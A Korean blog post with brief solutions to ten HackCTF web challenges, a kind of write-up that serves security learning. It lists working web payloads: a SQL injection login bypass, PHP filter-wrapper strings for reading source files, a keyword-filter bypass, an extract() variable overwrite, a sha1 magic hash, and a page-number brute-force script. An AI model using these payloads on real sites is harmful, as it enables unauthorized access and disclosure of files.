HackCTF 풀이 모음

Hunjison·2021년 7월 25일
0

CTF_WriteUp

목록 보기
4/5

1. /

robots.txt를 확인하자.

2. Hidden

?id=5

3. Button

button=flag로 value 값을 수정하면 된다.

4. 보물

코드 짜서 다 하다보면 나온다.

for i in range(1000,10000):

    url = f"http://ctf.j0n9hyun.xyz:2025/?page={i}"

    res=requests.get(url=url, headers=headers, verify=False)
    if res.text.find("HackCTF") != -1:
        print("find!", i, res.text)
        break

5. Guess me

extract 취약점.

filename=flag.txt가 되도록 변수를 정해주자.

풀이 : ?filename=flag.txt&guess=Nah...

6. Read File

아래와 같은 필터링을 걸고 있다(게싱...)

$command = $_GET['command'];
$command = preg_replace("/flag/" , "" , $command); 

command = flflagag.php 를 입력하자.


php wrapper를 이용할 수도 있다.

php://filter/convert.base64-encode/resource=flflagag.php
php://filter/read=string.toupper/resource=flflagag.php

7. Login

id = admin'||1-- g

pw = 아무거나

8. 마법봉

sha1 magic hash : 10932435112

9. Time

time = 0.6e7

sleep에서 int로 타입 캐스팅하는 과정에서 소숫점 이하를 버린다고 하는데, 실제 실험해볼 때에는 그렇지 않다... 다들 어떻게 그렇게 쉽게 이해하는건지.

추가적인 연구가 필요해 보인다. 일단 패스

10. Input Check

?text[]=flag

힌트가 있어서 풀 수 있었던 문제

profile
비전공자 출신 화이트햇 해커

0개의 댓글

관련 채용 정보